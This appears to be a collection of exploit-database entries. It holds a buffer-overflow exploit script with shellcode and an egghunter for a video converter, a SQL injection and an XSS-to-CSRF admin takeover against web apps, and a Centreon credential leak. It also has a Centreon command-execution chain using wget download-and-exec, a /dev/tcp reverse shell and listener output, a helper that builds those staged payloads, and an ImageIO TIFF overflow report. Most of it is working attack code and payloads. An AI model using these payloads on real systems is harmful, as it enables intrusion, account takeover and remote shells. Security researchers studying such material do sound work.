# 89E5        mov ebp, esp
shellcode  = b'\x54\x5D'          # push esp # pop ebp
# DBCD        fcmovne st, st(5)
shellcode += b'\x89\xCF'          # mov edi, ecx
# D975 F4     fstenv [ebp-C]
shellcode += b'\x47\x47\x90'      # inc edi # inc edi # nop
# 5F          pop edi
shellcode += b'\x90'              # nop
shellcode += b"\x57\x59\x49"
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50"
shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59"
shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b"
shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c"
shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a"
shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35"
shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51"
shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a"
shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50"
shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42"
shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31"
shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a"
shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59"
shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53"
shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b"
shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c"
shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46"
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45"
shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36"
shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50"
shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d"
shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35"
shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f"
shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58"
shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58"
shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30"
shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37"
shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50"
shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32"
shellcode += b"\x4c\x43\x53\x35\x50\x41\x41"

# Stack EggHunter for fun & profit
egg = 'BOKU'
hunterOS = '\x41'*(2784-len(egg+egg+shellcode))

# After executing the code in nSEH, we are left with 88 bytes to create our Hunter
hunter  = '\x4C'*4                  # dec esp * 4 / avoid sub bad char / topOfStack=GetPC
hunter += '\x5B'                    # pop ebx / EBX=PC
hunter += '\x80\x43\x29\x20'        # add byte [ebx+41], 0x20 / 20+55=7F=jnz
hunter += '\x80\x43\x33\x20'        # add byte [ebx+51], 0x20 / 20+55=7F=jnz
hunter += '\xB8\x42\x4F\x4B\x55'    # mov eax,0x424f4b55
hunter += '\x54'                    # push esp
hunter += '\x59'                    # pop ecx
hunter += '\x90'*18                 # nop fillers for jnz short -7 loop
hunter += '\x49'                    # dec ecx
hunter += '\x3B\x01'                # cmp eax, [ecx]
hunter += '\x55\xF7'                # 75F7 = jnz short -7 / Have to avoid bad \xF- chars
hunter += '\x51'                    # push ecx
hunter += '\x5a'                    # pop edx
hunter += '\x4a'*4                  # dec edx * 4 / check if second egg matchs
hunter += '\x3B\x02'                # cmp eax, [edx]
hunter += '\x55\xDF'                # jnz short -31 / back to the loop - avoid bad chars
hunter += '\x83\xc1\04'             # add ecx, 0x4 / start of shellcode after eggs
hunter += '\x31\xd2'                # xor edx,edx
hunter += '\x52'                    # push edx
hunter += '\xC6\x44\x24\x02\x4B'    # mov byte [esp+0x2],0x4b
hunter += '\xC6\x44\x24\x01\x44'    # mov byte [esp+0x1],0x44
hunter += '\xC6\x04\x24\x39'        # mov byte [esp],0x39
# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe)
hunter += '\xc3'                    # ret
huntRmdr = '\x41'*(88-len(hunter))

nsehOS = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))
nSEH = '\x83\xC4\x04\xC3'           # add esp,byte +0x4 # ret

# 3-byte SEH overwrite using the truncating Null byte
SEH = '\x0f\x47\x4c'                # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE}

payload = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH

try:
    f=open("crash.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
21. # Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection
# Date: 2020-01-27
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
# Vendor Homepage: www2.octeth.com
# Version: Octeth Oempro v.4.7 and v.4.8
# Tested on: Oempro v.4.7
# CVE : CVE-2019-19740

An authenticated user can easily exploit this vulnerability.
Octeth Oempro 4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get is vulnerable.

# Error condition
POST /api.php HTTP/1.1
Host: 127.0.0.1

command=Campaign.Get&CampaignID=2019'&responseformat=JSON

# SQL Injection exploitation
POST /api.php HTTP/1.1
Host: 127.0.0.1

command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON
22. # Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Sarthak Saini
# Date: 2020-01-18
# Vendor Link : https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.8
# CVE:CVE-2020-7991
# Category: Webapps
# Tested on: Windows 64-bit / Mozilla Firefox
#
# |--!>
|----------------------------------------------------------------------------------

1) Persistent Cross-Site Scripting at the user add page

Description : The parameter 'userUsername=' is vulnerable to stored cross-site scripting.

Payload:- <script>alert(1)</script>

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3

|----------------------------------------------------------------------------------

2) Account takeover - Cross-Site Request Forgery (Change Admin Password)

Description : An attacker can craft malicious JavaScript and attach it to the stored XSS; when the admin visits the /admin/user page the payload will trigger.

-> Save the payload as exp.js
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
function execute() {
    var nuri = "http://192.168.2.5/admin/config";
    var xhttp = new XMLHttpRequest();
    xhttp.open("POST", nuri, true);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhttp.withCredentials = true;   // send the admin's session cookie with the forged request
    var body = "";
    body += "\r\n\r\n";
    body += "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
    xhttp.send(body);
    return true;
}
execute();
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-

-> Start a server and host the exp.js. Send the exp.js file in the XSS payload.

Payload:- <script src="http://192.168.2.5/exp.js"></script>

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3

-> As soon as the admin visits the page the payload will be triggered and the admin password will be changed to hacked@123.

|-----------------------------------------EOF-----------------------------------------
23. # Exploit Title: Centreon 19.10.5 - Database Credentials Disclosure
# Date: 2020-01-27
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -

###########################################################################################################

Centreon 19.10.5 Database Credentials Disclosure

Trusted by SMBs and Fortune 500 companies worldwide. An industry reference in IT Infrastructure monitoring for the enterprise. Counts 200,000+ ITOM users worldwide and an international community of software collaborators. Presence in Toronto and Luxembourg.

Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Health care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.

###########################################################################################################

POC:
- Configuration / Pollers / Broker configuration
-- Central-broker | Central-broker-master
--- Output

It is possible to discover the unencrypted password with the browser inspector.

DB user      centreon
DB password  ********

<input size="120" name="output[0][db_password]" type="password" value="ZVy892xx">
24. # Exploit Title: Centreon 19.10.5 - Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Fabien AUNAY, Omri BASO
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -

###########################################################################################################

Centreon 19.10.5 Remote Command Execution Resources

Trusted by SMBs and Fortune 500 companies worldwide. An industry reference in IT Infrastructure monitoring for the enterprise. Counts 200,000+ ITOM users worldwide and an international community of software collaborators. Presence in Toronto and Luxembourg.

Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Health care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.

It is possible to call binaries not only in the default $USER$ path by adding Poller Resources. By adding two entries it is possible to trigger a download-and-exec reverse shell. Note that the reverse shell is persistent, because Centreon executes the payloads every 10 minutes by default.

Steps:
Objective 1 : Add Download Resource
Objective 2 : Add Exec Resource
Objective 3 : Create both of your check commands
Objective 4 : Create your services and link them with a host
Restart the Central.

###########################################################################################################

# Objective 1 : Add Download Resource
- Configuration/Pollers/Resources
- Problem:
  Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
  Illegal Macro Output Characters : `~$^&"|'<>
  Maximum client side input size limit: 35
- Information:
  Read the Centreon documentation: To install Centreon software from the repository, you should first install the centreon-release package, which will provide the repository file. Some may not have the wget package installed. If not, perform the following: yum install wget

Solution 1: Remove the restriction in Configuration/Pollers/Engine configuration
Solution 2: Modify the input size in the client-side inspector: <input> size="250"
Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh

# Objective 2 : Add Exec Resource
- Configuration/Pollers/Resources
- Problem:
  Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
  Illegal Macro Output Characters : `~$^&"|'<>
  Maximum client side input size limit: 35

Solution: Use a custom payload -> bash /tmp/x.sh

# Objective 3 : Create both of your check commands with your resources $xxx$ without arguments

# Objective 4 : Create your services and link them with a host

POC:

Payload x.sh :
0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121

python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 -

nc -lvnp 1234
Ncat: Version 7.50
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:43128.
id
uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
sudo -l
Matching Defaults entries for centreon-engine on centreon-lab:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset,
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty

User centreon-engine may run the following commands on centreon-lab:
    (root) NOPASSWD: /sbin/service centreontrapd start
    (root) NOPASSWD: /sbin/service centreontrapd stop
    (root) NOPASSWD: /sbin/service centreontrapd restart
    (root) NOPASSWD: /sbin/service centreontrapd reload
    (root) NOPASSWD: /usr/sbin/service centreontrapd start
    (root) NOPASSWD: /usr/sbin/service centreontrapd stop
    (root) NOPASSWD: /usr/sbin/service centreontrapd restart
    (root) NOPASSWD: /usr/sbin/service centreontrapd reload
    (root) NOPASSWD: /sbin/service centengine start
    (root) NOPASSWD: /sbin/service centengine stop
    (root) NOPASSWD: /sbin/service centengine restart
    (root) NOPASSWD: /sbin/service centengine reload
    (root) NOPASSWD: /usr/sbin/service centengine start
    (root) NOPASSWD: /usr/sbin/service centengine stop
    (root) NOPASSWD: /usr/sbin/service centengine restart
    (root) NOPASSWD: /usr/sbin/service centengine reload
    (root) NOPASSWD: /bin/systemctl start centengine
    (root) NOPASSWD: /bin/systemctl stop centengine
    (root) NOPASSWD: /bin/systemctl restart centengine
    (root) NOPASSWD: /bin/systemctl reload centengine
    (root) NOPASSWD: /usr/bin/systemctl start centengine
    (root) NOPASSWD: /usr/bin/systemctl stop centengine
    (root) NOPASSWD: /usr/bin/systemctl restart centengine
    (root) NOPASSWD: /usr/bin/systemctl reload centengine
    (root) NOPASSWD: /sbin/service cbd start
    (root) NOPASSWD: /sbin/service cbd stop
    (root) NOPASSWD: /sbin/service cbd restart
    (root) NOPASSWD: /sbin/service cbd reload
    (root) NOPASSWD: /usr/sbin/service cbd start
    (root) NOPASSWD: /usr/sbin/service cbd stop
    (root) NOPASSWD: /usr/sbin/service cbd restart
    (root) NOPASSWD: /usr/sbin/service cbd reload
    (root) NOPASSWD: /bin/systemctl start cbd
    (root) NOPASSWD: /bin/systemctl stop cbd
    (root) NOPASSWD: /bin/systemctl restart cbd
    (root) NOPASSWD: /bin/systemctl reload cbd
    (root) NOPASSWD: /usr/bin/systemctl start cbd
    (root) NOPASSWD: /usr/bin/systemctl stop cbd
    (root) NOPASSWD: /usr/bin/systemctl restart cbd
    (root) NOPASSWD: /usr/bin/systemctl reload cbd
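The reason the advisory splits the payload into a download stage and an exec stage is the pair of constraints on the Resources form: the illegal-character lists and the 35-character client-side limit, which the reverse-shell line itself cannot satisfy. The checker below is an added example and not Centreon's code; it encodes those two constraints as quoted above (treating the union of both character lists as forbidden is a conservative assumption made here), builds the two stage values from a listener host, port and filename, and refuses any combination the form would reject.

```python
from typing import List, Tuple

# Constraints quoted in the advisory for the Resources form. Treating the union
# of both character lists as forbidden is a conservative assumption made here.
ILLEGAL_OBJECT_NAME = set('~!$%^&*"|\'<>?,()=')
ILLEGAL_MACRO_OUTPUT = set('`~$^&"|\'<>')
FORBIDDEN = ILLEGAL_OBJECT_NAME | ILLEGAL_MACRO_OUTPUT
MAX_INPUT_LEN = 35            # client-side <input> size limit quoted above


def check_resource_value(value: str) -> List[str]:
    """Return the reasons a value would be rejected; an empty list means it fits."""
    problems = []
    bad = "".join(sorted(set(value) & FORBIDDEN))
    if bad:
        problems.append("illegal characters: " + bad)
    if len(value) > MAX_INPUT_LEN:
        problems.append("length %d exceeds %d" % (len(value), MAX_INPUT_LEN))
    return problems


def stage(host: str, port: int, name: str, directory: str = "/tmp/") -> Tuple[str, str]:
    """Build the two resource values (download stage, exec stage) in the form the
    advisory uses, and refuse combinations that would not survive the filters."""
    download = "wget -P %s %s:%d/%s" % (directory, host, port, name)
    execute = "bash %s%s" % (directory, name)
    for value in (download, execute):
        problems = check_resource_value(value)
        if problems:
            raise ValueError("%r: %s" % (value, "; ".join(problems)))
    return download, execute


# The reverse-shell line from x.sh, kept only to check it against the filters:
# it is both too long and full of forbidden characters, hence the two stages.
REVERSE_SHELL = "0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121"


if __name__ == "__main__":
    print(stage("127.0.0.1", 8080, "x.sh"))
    print("x.sh payload as a resource value:", check_resource_value(REVERSE_SHELL))
```

With a loopback listener the builder reproduces the two values on the page exactly; a longer hostname (anything that pushes the download line past 35 characters) is rejected before it is pasted into the form, which is the failure that otherwise only shows up as a silently truncated resource.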
25. The attached tiff image causes a crash in ImageIO on the latest macOS and iOS. To reproduce the issue, the attached code (tester.m) can be used. I've attached another code snippet to reproduce the issue on iOS as well.

With tester.m compiled with ASAN, processing the attached tiff image should crash with an access violation similar to the following:

% ./tester fuzzed.tif
AddressSanitizer:DEADLYSIGNAL
=================================================================
==70578==ERROR: AddressSanitizer: SEGV on unknown address 0x00010decf000 (pc 0x7fff3a588390 bp 0x7ffee8fbb6d0 sp 0x7ffee8fbb0e0 T0)
==70578==The signal is caused by a WRITE memory access.
    #0 0x7fff3a58838f in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector<IIODecodeFrameParams, std::__1::allocator<IIODecodeFrameParams> >&) (ImageIO:x86_64h+0xab38f)
    #1 0x7fff6e8ca512 in _dispatch_client_callout2 (libdispatch.dylib:x86_64+0x3512)
    #2 0x7fff6e8dabcb in _dispatch_apply_serial (libdispatch.dylib:x86_64+0x13bcb)
    #3 0x7fff6e8ca4dd in _dispatch_client_callout (libdispatch.dylib:x86_64+0x34dd)
    #4 0x7fff6e8cde62 in _dispatch_sync_function_invoke (libdispatch.dylib:x86_64+0x6e62)
    #5 0x7fff6e8daaf4 in dispatch_apply_f (libdispatch.dylib:x86_64+0x13af4)
    #6 0x7fff3a587028 in TIFFReadPlugin::CallDecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, IIORequest, std::__1::vector<IIODecodeFrameParams, std::__1::allocator<IIODecodeFrameParams> >&) (ImageIO:x86_64h+0xaa028)
    #7 0x7fff3a513f29 in TIFFReadPlugin::copyImageBlockSet(InfoRec*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x36f29)
    #8 0x7fff3a4f7a1d in IIO_Reader::CopyImageBlockSetProc(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x1aa1d)
    #9 0x7fff3a4f6dfe in IIOImageProviderInfo::CopyImageBlockSetWithOptions(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x19dfe)
    #10 0x7fff37a9eb13 in imageProvider_retain_data (CoreGraphics:x86_64h+0x3cb13)
    #11 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f)
    #12 0x7fff37a9eab1 in provider_for_destination_retain_data (CoreGraphics:x86_64h+0x3cab1)
    #13 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f)
    #14 0x7fff37a9e949 in CGAccessSessionCreate (CoreGraphics:x86_64h+0x3c949)
    #15 0x7fff37a9cb8c in img_data_lock (CoreGraphics:x86_64h+0x3ab8c)
    #16 0x7fff37a9839a in CGSImageDataLock (CoreGraphics:x86_64h+0x3639a)
    #17 0x7fff37a97d92 in RIPImageDataInitializeShared (CoreGraphics:x86_64h+0x35d92)
    #18 0x7fff37a97951 in RIPImageCacheGetRetained (CoreGraphics:x86_64h+0x35951)
    #19 0x7fff37a97426 in ripc_AcquireRIPImageData (CoreGraphics:x86_64h+0x35426)
    #20 0x7fff37a966eb in ripc_DrawImage (CoreGraphics:x86_64h+0x346eb)
    #21 0x7fff37a95a1f in CGContextDrawImageWithOptions (CoreGraphics:x86_64h+0x33a1f)
    #22 0x106c42aab in main (tester:x86_64+0x100001aab)
    #23 0x7fff6e91a404 in start (libdyld.dylib:x86_64+0x11404)

==70578==Register values:
rax = 0xffffffffffffff01  rbx = 0x0000800080008080  rcx = 0x0000000000000080  rdx = 0x0000000000000008
rdi = 0x0000000000000000  rsi = 0x0000000000000000  rbp = 0x00007ffee8fbb6d0  rsp = 0x00007ffee8fbb0e0
 r8 = 0x0000632000003002   r9 = 0x00000000000000ff  r10 = 0x0000800080008080  r11 = 0xfffffffffffffff0
r12 = 0x0000000000000001  r13 = 0x000000010decf000  r14 = 0x0000000000000008  r15 = 0x0000000000000000
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (ImageIO:x86_64h+0xab38f) in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector<IIODecodeFrameParams, std::__1::allocator<IIODecodeFrameParams> >&)
==70578==ABORTING

The overflow happens out of an mmap region, as the memory buffer is allocated using ImageIO_Malloc, which is itself mostly a thin wrapper around mmap.

The crashing image was found through fuzzing and both the crashing as well as the original image are attached. The relevant byte change removes the BitsPerSample entry (original value is 8) from the TIFF file, in which case a default value of 1 will be used. As the SamplesPerPixel entry is still 3, the image will contain 3 bits per pixel, one for the red, one for the green, and one for the blue component.

ImageIO will then allocate width*height*3 bytes of memory (for an RGB bitmap) using ImageIO_Malloc, then call TIFFReadPlugin::DecodeBlocks to write the image data into the buffer. Next, ImageIO uses the tile-oriented TIFF api [1] to read out a tile of the image in its current encoding (3 bits per pixel). The default tile size seems to be 0x100 x 0x100 and so the entire image (which is 143 x 190 pixels large) fits into one tile. Since there are three bits per pixel, the tile has a total of 0x100*0x100*3/8 = 0x6000 bytes, which is what TIFFReadTile returns. Finally, it appears that ImageIO then uses the returned size (0x6000) to decode the image instead of the correct image size (143 x 190). As such, it writes 0x6000*8 bytes (since the output format uses 8 bits per component, not 1) to the output buffer, or about 2.4 times the allocated size. The program then crashes with a memory violation.

Since the buffer is already allocated using mmap, adding a guard page after it would likely prevent this and similar bugs from being exploitable in the future.

The attached archive contains the original image and the mutated one causing the crash. It also contains code to reproduce the issue on macOS and iOS. Finally, it contains a python script to change the byte in question in the original file to remove the BitsPerSample entry and thus trigger the issue.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47970.zip
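The size arithmetic in the write-up is the whole bug, so it is worth seeing it carried through. The block below is an added example and not Apple's code: it takes the geometry given above (143 x 190 pixels, SamplesPerPixel 3, BitsPerSample falling back to 1, 0x100 x 0x100 tiles), computes what ImageIO allocates, what TIFFReadTile returns, how many bytes the 1-bit-to-8-bit expansion writes when the tile byte count is trusted as the sample count, and the bound a decoder that clips the tile to the image rectangle would apply instead. The tile default and the "one byte per component" output format are taken from the write-up; the expansion model is this example's reading of it and applies only to the sub-byte path described there.

```python
from dataclasses import dataclass


@dataclass
class TiffGeometry:
    width: int
    height: int
    samples_per_pixel: int
    bits_per_sample: int        # libtiff default is 1 when the tag is absent
    tile_w: int = 0x100         # default tile size observed in the write-up
    tile_h: int = 0x100


def output_buffer_bytes(g: TiffGeometry) -> int:
    """What ImageIO allocates: width*height*samples at 8 bits per component."""
    return g.width * g.height * g.samples_per_pixel


def encoded_tile_bytes(g: TiffGeometry) -> int:
    """What TIFFReadTile hands back: one whole tile in the file's bit depth."""
    return g.tile_w * g.tile_h * g.samples_per_pixel * g.bits_per_sample // 8


def expanded_write_bytes(g: TiffGeometry) -> int:
    """Bytes written when the tile byte count is used as the sample count:
    every bits_per_sample-wide sample becomes an 8-bit component, so a tile
    of N bytes turns into N * (8 / bits_per_sample) output bytes."""
    return encoded_tile_bytes(g) * 8 // g.bits_per_sample


def overflow_bytes(g: TiffGeometry) -> int:
    """How far the expanded write runs past the allocation (0 if it fits)."""
    return max(0, expanded_write_bytes(g) - output_buffer_bytes(g))


def clipped_write_bytes(g: TiffGeometry) -> int:
    """The bound a correct decoder applies: only the part of the tile inside
    the image rectangle is converted, so for a single-tile image the write
    can never exceed the allocation."""
    visible_w = min(g.width, g.tile_w)
    visible_h = min(g.height, g.tile_h)
    return visible_w * visible_h * g.samples_per_pixel


if __name__ == "__main__":
    fuzzed = TiffGeometry(width=143, height=190, samples_per_pixel=3, bits_per_sample=1)
    print("allocated      :", output_buffer_bytes(fuzzed))
    print("tile bytes     : 0x%x" % encoded_tile_bytes(fuzzed))
    print("expanded write :", expanded_write_bytes(fuzzed))
    print("overflow       :", overflow_bytes(fuzzed),
          "(%.1fx the allocation)" % (expanded_write_bytes(fuzzed) / output_buffer_bytes(fuzzed)))
    print("clipped write  :", clipped_write_bytes(fuzzed))
```

The numbers match the write-up: 81510 bytes allocated, a 0x6000-byte tile, 196608 bytes written, about 2.4 times the allocation, while the clipped write is exactly the allocation size. The guard-page suggestion at the end of the write-up does not change any of these values; it only turns the out-of-bounds write into an immediate fault instead of a silent corruption of whatever mmap placed next.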